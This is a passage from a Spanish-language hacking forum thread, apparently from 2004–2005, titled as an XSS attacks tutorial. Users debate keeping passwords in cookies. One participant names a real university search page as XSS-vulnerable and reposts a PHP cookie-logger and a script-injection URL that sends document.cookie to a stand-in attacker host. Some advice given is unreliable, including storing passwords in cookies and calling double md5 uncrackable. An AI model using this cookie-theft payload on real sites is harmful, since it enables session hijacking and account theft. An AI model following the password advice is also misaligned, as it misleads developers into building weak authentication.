elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 146,094 veces)
Firos
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.410


Enseña lo que sepas... y oculta lo peor...


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #10 en: 5 Junio 2004, 01:08 am »

Ok ok, muchas gracias, mas o menos tenia la idea ;)

Salu2..


En línea

El final del camino no está determinado, lo determinamos nosotros mismos paso a paso, día a día, y se puede cambiar.
-Riven-Ward-
RivenSoft


Desconectado Desconectado

Mensajes: 2.215


Do you like Mario? xDDDDDDDDDDDD


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #11 en: 14 Julio 2004, 13:33 pm »

Pido perdón por revivir este post un poco viejo, pero releyendolo me dí cuenta de algo:

poniendote el ejemplo de mi website:
yo cuando un usuario se loggea coloco dos cookies:
-Una con su nombre de usuario
-Otra con su password

a la primera la llamo n_user y a la segunda n_pass y si me hago el atako a mi mismo -> los valores que me dan(en el archivo.txt) son de esta forma:
n_user=neohex; n_pass=123456

Hace poco hice mi Sistema de Registro de users, y guardaba la cookie con el nombre del user y su contraseña.

Luego me dí cuenta de que si "algún hacker" entra en el PC de alguno de mis users, lo primero (o una de las primeras) cosas que hará sería ir a ver las Cookies, entonces obtendría la contraseña del user.

Y tomando en cuenta eso, supongo que las páginas importantes o los programadores "inteligentes" no guardarían la contraseña en una Cookie...


PD: neohex, te recomiendo que también dejes de guardar la contraseña en una Cookie


En línea

Usuario Banneado
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #12 en: 15 Julio 2004, 04:40 am »

Haber, mientras la contraseña esté bien cifrada no hay problema por el simple hecho de que si entra una persona en el pc de un user de tu website no creo que lo que vaya ha buscar sea precisamente la cookie de tu web, creo que se preocuparia por buscar otras cosas (como el archivo SAM y cosas mas importantes).

Ademas, es un riesgo que todo webmaster debe correr xD.

P.D: También hay que tener en cuenta que tu debes preocuparte de la seguridad de tu página web lo mismo que cada usuario debe preocuparse de la seguridad de su pc.
-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

P.D2: Preocupate por hacer tu web lo mas segura posible, que lo demas ya viene solo.
« Última modificación: 15 Julio 2004, 04:47 am por neohex » En línea

Firmado.
-Riven-Ward-
RivenSoft


Desconectado Desconectado

Mensajes: 2.215


Do you like Mario? xDDDDDDDDDDDD


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #13 en: 17 Julio 2004, 05:09 am »

Ademas, es un riesgo que todo webmaster debe correr xD.

--------

-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

1- No es necesario poner la contraseña en la cookie, no sirve de mucho :-\

2- Mucha, MUCHA gente usa la misma contraseña para casi todas sus cosas, y el "hacker" seguramente pensará en eso :).


Salu2!
En línea

Usuario Banneado
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #14 en: 17 Julio 2004, 05:19 am »

Haber Riven tio.....que manía tienes con quedarte encima mia xDDD.

Te explico:
-Tienes que poner la contraseña en la cookie porque si pones solo el nombre de usuario cualquiera puede cambiar su cookie y poner el nombre del administrador con lo cual ya se ha saltado tu sistema...... ::)

Te repito que si alguien entra en tu pc no va ha ir precisamente a por la cookie de tu web, se encargará de hacer cosas "mas bonitas".

P.D: Mientras le pases md5(md5($pass)); es suficiente...por lo menos eso ya es incrackeable(por fuerza bruta, siempre que la contraseña sea de una longitud considerable.)
En línea

Firmado.
joserra89


Desconectado Desconectado

Mensajes: 987


"./"


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #15 en: 15 Septiembre 2004, 08:03 am »

Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???
En línea

"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"


9reynas

Desconectado Desconectado

Mensajes: 59



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #16 en: 10 Noviembre 2004, 11:03 am »

debido  a lo antiguo de este no se si  daran respuesta  bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
 umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la  que le tendrian que linkear los demas
 que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
 asi ademas esta web  no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas
En línea

9reynas

Desconectado Desconectado

Mensajes: 59



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #17 en: 10 Noviembre 2004, 11:37 am »

respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  ::)
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie



cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro  lo del archivo.txt que se deposita la cokie alli tambiene sta caro
 pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi  en este formato          lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

 ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;





ahora analizando la primera pareja checamos esta parte
 'http://www.atacante.com/cookies.php?cookie='+document.cookie


ahora  en esto el  cgi seria cookies.php
 y su pareja seria cookie='+document.cookie



ahora sia lguien postea las  fuentes de buscador.php seria buenisimo igual  la voya  buscar supongo que eso nos aclararia bastante loq ue hace esa url

 buenoo voya buscar ciao 
9reynas
  de ante mano si me equivoco en algo corriganme y  nada salu2




En línea

Adept

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #18 en: 12 Noviembre 2004, 02:18 am »

Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?
En línea

Those were the words of Adept...
Falso Positivo

Desconectado Desconectado

Mensajes: 243



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #19 en: 15 Agosto 2005, 23:02 pm »


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.
En línea

Don't worry, be hacked....
Páginas: 1 [2] 3 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
OceanLotus APT usa el RAT Ratsnif en sus ataques
Noticias
wolfbcn 0 1,031 Último mensaje 3 Julio 2019, 02:07 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines